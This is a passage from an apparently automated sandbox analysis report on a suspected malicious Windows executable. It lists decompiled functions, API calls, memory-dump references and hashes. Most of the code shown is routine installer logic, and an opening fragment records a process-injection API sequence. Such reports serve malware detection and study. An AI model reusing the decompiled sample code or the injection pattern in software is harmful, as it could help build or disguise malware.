                • CreateProcessW.KERNELBASE(?,00000000), ref: 02280373
                • GetThreadContext.KERNELBASE(?,00010007), ref: 02280396
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 022803BA
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID: Process$ContextCreateMemoryReadThread
                • String ID:
                • API String ID: 2411489757-0
                • Opcode ID: 5c71018980325046be9aca3b83cd26c889ee106ee3e07fcb318ec7da3c7f197a
                • Instruction ID: 58a0e954ff5c46405c30dec2fa0800306a623c0f089f28ed0dd93257979643d0
                • Opcode Fuzzy Hash: 5c71018980325046be9aca3b83cd26c889ee106ee3e07fcb318ec7da3c7f197a
                • Instruction Fuzzy Hash: 8D322631E61229EEEB20DBE4DC45FADB7B5AF08704F204096E508FA2E0D7749A84DF15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040521E(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                0x0040209d
                0x0040209d
                0x004020a2
                0x004020a9
                0x00402164
                0x004022dd
                0x004022dd
                0x00402a5a
                0x00402a5d
                0x00402a69
                0x00402a69
                0x004020b8
                0x004020c2
                0x004020c5
                0x004020d4
                0x004020d8
                0x004020de
                0x004020e2
                0x0040215d
                0x00000000
                0x0040215d
                0x004020e4
                0x004020ed
                0x004020f1
                0x00402135
                0x004020f3
                0x004020f6
                0x004020f9
                0x00402129
                0x004020fb
                0x004020fe
                0x00402107
                0x00402109
                0x00402109
                0x00402107
                0x004020f9
                0x0040213d
                0x00402152
                0x00402152
                0x00000000
                0x0040213d
                0x004020c8
                0x004020ce
                0x004020d2
                0x00000000
                0x00000000
                0x00000000

                APIs
                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                  • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422848,7519EA30), ref: 0040527A
                  • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID:
                • API String ID: 2987980305-0
                • Opcode ID: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                • Opcode Fuzzy Hash: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405B28(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405ABA(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405761(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056E4(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                0x004015bb
                0x004015c2
                0x004015c5
                0x004015ca
                0x004015ce
                0x004015d0
                0x004015d8
                0x004015da
                0x004015dc
                0x004015e0
                0x004015e3
                0x004015fb
                0x004015fc
                0x004015e5
                0x004015e5
                0x004015e8
                0x00000000
                0x004015f3
                0x004015f4
                0x004015f4
                0x004015e8
                0x00401603
                0x0040160a
                0x00401617
                0x00401617
                0x0040160c
                0x0040160d
                0x00401615
                0x00000000
                0x00000000
                0x00401615
                0x0040160a
                0x0040161a
                0x0040161d
                0x0040161f
                0x00401620
                0x004015d0
                0x00401627
                0x00401652
                0x004022dd
                0x00401629
                0x0040162b
                0x00401636
                0x0040163c
                0x00401644
                0x0040164a
                0x0040164a
                0x00401644
                0x00402a5d
                0x00402a69

                APIs
                  • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                  • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 1892508949-1943935188
                • Opcode ID: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                • Opcode Fuzzy Hash: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401B87, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E00401B87(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40b878; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E0040618A(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x28)));
						_t11 =  *0x40b878; // 0x0
						 *_t34 = _t11;
						 *0x40b878 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E004060F7(_t33, _t2);
							_push(_t30);
							 *0x40b878 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = "Cgrlcpdlsle";
								E004060F7(_t36, _t30 + 4);
								_t21 =  *0x40b878; // 0x0
								E004060F7(_t32, _t21 + 4);
								_t24 =  *0x40b878; // 0x0
								_push(_t36);
								_push(_t24 + 4);
								E004060F7();
								L15:
								 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040618A(_t27, _t30, _t33, _t27, 0xffffffe8));
					E00405813();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}














                0x00401b87
                0x00401b87
                0x00401b8a
                0x00401b92
                0x00401bda
                0x00401c08
                0x00401c11
                0x00401c13
                0x00401c17
                0x00401c1c
                0x00401c21
                0x00401c23
                0x00401bdc
                0x00401bde
                0x004027bf
                0x00401be4
                0x00401be4
                0x00401be9
                0x00401bf0
                0x00401bf1
                0x00401bf6
                0x00401bf6
                0x00401bde
                0x00000000
                0x00401b94
                0x00401b94
                0x00401b94
                0x00401b97
                0x00000000
                0x00000000
                0x00401b9d
                0x00401ba1
                0x00000000
                0x00401ba3
                0x00401ba5
                0x00000000
                0x00401bab
                0x00401bab
                0x00401bae
                0x00401bb5
                0x00401bba
                0x00401bc4
                0x00401bc9
                0x00401bce
                0x00401bd2
                0x00402918
                0x00402a5a
                0x00402a5d
                0x00402a63
                0x00402a63
                0x00401ba5
                0x00000000
                0x00401ba1
                0x00402374
                0x00402381
                0x00402382
                0x00402387
                0x00402387
                0x00402a65
                0x00402a69

                APIs
                • GlobalFree.KERNEL32 ref: 00401BF6
                • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C08
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Global$AllocFree
                • String ID: Cgrlcpdlsle
                • API String ID: 3394109436-1075718742
                • Opcode ID: 401988b6dd0437a3d7756572422dd002b5d5607acde73d1ce5ab64801902719a
                • Instruction ID: e4cc8bcb7752a4f6b3811e2611bd1e0fa57f8e281b648bd21e3e74c9503b19de
                • Opcode Fuzzy Hash: 401988b6dd0437a3d7756572422dd002b5d5607acde73d1ce5ab64801902719a
                • Instruction Fuzzy Hash: 74219673644101EBDB20EB65DE88E5E73E8EB44318711413BF602B72D1DB78D8529B5D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f470;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
					}
				}
				return 0;
			}











                0x0040138a
                0x004013fa
                0x0040139b
                0x004013a0
                0x00000000
                0x00000000
                0x004013a2
                0x004013a3
                0x004013ad
                0x00000000
                0x00401404
                0x004013b0
                0x004013b7
                0x004013bd
                0x004013be
                0x004013c0
                0x004013c2
                0x004013b9
                0x004013b9
                0x004013ba
                0x004013ba
                0x004013c9
                0x004013cb
                0x004013f4
                0x004013f4
                0x004013c9
                0x00000000

                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32 ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406500, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00406500(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E00406492(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                0x00406508
                0x0040650b
                0x00406512
                0x0040651a
                0x00406526
                0x00000000
                0x0040652d
                0x0040651d
                0x00406524
                0x00000000
                0x00406535
                0x00000000

                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                  • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
                  • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                  • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405C90, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E00405C90(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                0x00405c94
                0x00405ca1
                0x00405cb6
                0x00405cbc

                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405C94
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405C6B, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405C6B(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                0x00405c70
                0x00405c76
                0x00405c7b
                0x00405c84
                0x00405c84
                0x00405c8d

                APIs
                • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405761, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405761(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                0x00405767
                0x0040576f
                0x00000000
                0x00405775
                0x00000000

                APIs
                • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405D08, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405D08(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                0x00405d0c
                0x00405d1c
                0x00405d24
                0x00000000
                0x00405d2b
                0x00000000
                0x00405d2d

                APIs
                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405D37, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405D37(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
